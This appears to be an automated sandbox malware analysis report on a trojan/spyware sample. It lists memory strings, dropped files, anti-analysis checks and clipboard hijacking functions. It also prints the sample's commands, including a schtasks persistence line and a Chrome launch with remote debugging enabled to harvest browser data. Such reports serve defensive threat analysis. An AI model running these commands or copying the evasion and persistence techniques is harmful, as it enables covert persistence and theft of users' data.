Source: chrome.exe, 00000004.00000002.2171712893.0000036C02E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2166857702.0000036C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173342687.0000036C03084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173378034.0000036C0309C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6953
Source: chrome.exe, 00000004.00000002.2166857702.0000036C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2171344775.0000036C02DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173342687.0000036C03084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173378034.0000036C0309C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7036
Source: chrome.exe, 00000004.00000002.2171712893.0000036C02E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2166857702.0000036C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173342687.0000036C03084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173378034.0000036C0309C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7047
Source: chrome.exe, 00000004.00000002.2171712893.0000036C02E7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7047b
Source: chrome.exe, 00000004.00000002.2171712893.0000036C02E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2166857702.0000036C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173342687.0000036C03084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173378034.0000036C0309C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 00000004.00000002.2171712893.0000036C02E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2166857702.0000036C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173342687.0000036C03084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173378034.0000036C0309C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 00000004.00000002.2171712893.0000036C02E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2166857702.0000036C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173342687.0000036C03084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173378034.0000036C0309C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 00000004.00000002.2171712893.0000036C02E7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7370ei
Source: chrome.exe, 00000004.00000002.2166857702.0000036C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2169005269.0000036C02A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173342687.0000036C03084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173378034.0000036C0309C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 00000004.00000002.2171712893.0000036C02E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2166857702.0000036C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173342687.0000036C03084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173378034.0000036C0309C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 00000004.00000002.2171712893.0000036C02E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2166857702.0000036C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173342687.0000036C03084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173378034.0000036C0309C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 00000004.00000002.2171712893.0000036C02E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2166857702.0000036C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173342687.0000036C03084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173378034.0000036C0309C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 00000004.00000003.2140199657.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167956106.0000036C02894000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000004.00000003.2140199657.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167956106.0000036C02894000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000004.00000003.2140199657.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167149171.0000036C02684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167956106.0000036C02894000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000004.00000002.2168420648.0000036C02960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167320808.0000036C026F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000003.2139808427.0000036C0269C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000004.00000003.2139808427.0000036C0269C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000004.00000002.2166506669.0000036C0252C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.c
Source: chrome.exe, 00000004.00000003.2139808427.0000036C0269C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000004.00000003.2139808427.0000036C0269C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000004.00000002.2166506669.0000036C0252C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 00000004.00000003.2139808427.0000036C0269C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000004.00000003.2139808427.0000036C0269C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000004.00000003.2139808427.0000036C0269C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2166506669.0000036C0252C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000004.00000003.2139808427.0000036C0269C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000004.00000003.2139808427.0000036C0269C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2166506669.0000036C0252C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000004.00000003.2139808427.0000036C0269C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000004.00000002.2166506669.0000036C0252C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000004.00000003.2140199657.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167956106.0000036C02894000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000004.00000003.2140199657.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167956106.0000036C02894000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000004.00000003.2140199657.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167956106.0000036C02894000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000004.00000002.2166363170.0000036C02500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2140199657.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167956106.0000036C02894000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000004.00000002.2171517207.0000036C02E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2169796263.0000036C02BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000004.00000002.2169796263.0000036C02BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: chrome.exe, 00000004.00000002.2171416675.0000036C02E0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 00000004.00000002.2171517207.0000036C02E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000004.00000002.2171517207.0000036C02E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabA
Source: chrome.exe, 00000004.00000002.2171517207.0000036C02E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: ELLRGATenShKoyKeRtXA.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ip
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ipbefore
Source: chrome.exe, 00000004.00000002.2165859019.0000036C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000004.00000002.2165859019.0000036C0240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167562513.0000036C027B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000004.00000002.2165859019.0000036C0240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2171517207.0000036C02E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000004.00000002.2167228646.0000036C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000004.00000003.2140199657.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167956106.0000036C02894000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000004.00000003.2140199657.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167956106.0000036C02894000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000004.00000003.2140199657.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167956106.0000036C02894000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000004.00000003.2140199657.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167149171.0000036C02684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167956106.0000036C02894000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0E9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0E9D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 8_2_6C0E9E27

System Summary

Source: C:\Users\user\Desktop\95e1Fwp61u.exe File dump: service123.exe.0.dr 314617856
Source: 95e1Fwp61u.exe Static PE information: section name:
Source: 95e1Fwp61u.exe Static PE information: section name: .idata
Source: 95e1Fwp61u.exe Static PE information: section name:
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process Stats: CPU usage > 49%
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\service123.exe 588990BA03C40D8FA04671C882E1BF46773A14AC6AA8E15A556FFEBC18D82EEA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A3B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A36E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C19ADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A3820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A5A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A5980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A3560 appears 43 times
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 1144
Source: 95e1Fwp61u.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 95e1Fwp61u.exe Static PE information: Section: wfipzyes ZLIB complexity 0.9943886664944903
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/7@14/4
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File created: C:\Users\user\AppData\Local\uABDlLMkuJ
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5288
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\woUNydxtUFQatgBImlJF
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: chrome.exe, 00000004.00000002.2166949765.0000036C02614000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: 95e1Fwp61u.exe Virustotal: Detection: 48%
Source: 95e1Fwp61u.exe ReversingLabs: Detection: 60%
Source: unknown Process created: C:\Users\user\Desktop\95e1Fwp61u.exe "C:\Users\user\Desktop\95e1Fwp61u.exe"
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=2000,i,15655755230875397707,13609631537999439981,262144 /prefetch:8
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 1144
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=2000,i,15655755230875397707,13609631537999439981,262144 /prefetch:8
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: 95e1Fwp61u.exe Static file information: File size 4509184 > 1048576
Source: 95e1Fwp61u.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: 95e1Fwp61u.exe Static PE information: Raw size of wfipzyes is bigger than: 0x100000 < 0x1c5c00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00B48230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 8_2_00B48230
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: 95e1Fwp61u.exe Static PE information: real checksum: 0x454cda should be: 0x45a0f8
Source: 95e1Fwp61u.exe Static PE information: section name:
Source: 95e1Fwp61u.exe Static PE information: section name: .idata
Source: 95e1Fwp61u.exe Static PE information: section name:
Source: 95e1Fwp61u.exe Static PE information: section name: wfipzyes
Source: 95e1Fwp61u.exe Static PE information: section name: apfxvsxz
Source: 95e1Fwp61u.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: ELLRGATenShKoyKeRtXA.dll.0.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00B4A521 push es; iretd 8_2_00B4A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C180C30 push eax; mov dword ptr [esp], edi 8_2_6C180DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C14ED10 push eax; mov dword ptr [esp], ebx 8_2_6C14EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C124E31 push eax; mov dword ptr [esp], ebx 8_2_6C124E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C118E7A push edx; mov dword ptr [esp], ebx 8_2_6C118E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11A947 push eax; mov dword ptr [esp], ebx 8_2_6C11A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C14EAB0 push eax; mov dword ptr [esp], ebx 8_2_6C14EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C120AA2 push eax; mov dword ptr [esp], ebx 8_2_6C120AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C138AA0 push eax; mov dword ptr [esp], ebx 8_2_6C13909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C122AAC push edx; mov dword ptr [esp], ebx 8_2_6C122AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C152BF0 push eax; mov dword ptr [esp], ebx 8_2_6C152F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C152BF0 push edx; mov dword ptr [esp], ebx 8_2_6C152F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C118435 push edx; mov dword ptr [esp], ebx 8_2_6C118449
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C138460 push eax; mov dword ptr [esp], ebx 8_2_6C138A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11048B push eax; mov dword ptr [esp], ebx 8_2_6C1104A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1104E0 push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F1CFA push eax; mov dword ptr [esp], ebx 8_2_6C1A6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11A5A7 push eax; mov dword ptr [esp], ebx 8_2_6C11A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C152620 push eax; mov dword ptr [esp], ebx 8_2_6C152954
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C152620 push edx; mov dword ptr [esp], ebx 8_2_6C152973
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1606B0 push eax; mov dword ptr [esp], ebx 8_2_6C160A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1106A2 push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1286A1 push 890005EAh; ret 8_2_6C1286A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1106A6 push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1166F3 push edx; mov dword ptr [esp], ebx 8_2_6C116707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1106FD push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11070E push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11A777 push eax; mov dword ptr [esp], ebx 8_2_6C11A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C120042 push eax; mov dword ptr [esp], ebx 8_2_6C120056
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0EE0D0 push eax; mov dword ptr [esp], ebx 8_2_6C1A6AF6
Source: 95e1Fwp61u.exe Static PE information: section name: wfipzyes entropy: 7.956035978180135
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File created: C:\Users\user\AppData\Local\Temp\ELLRGATenShKoyKeRtXA.dll
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe

Boot Survival

Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
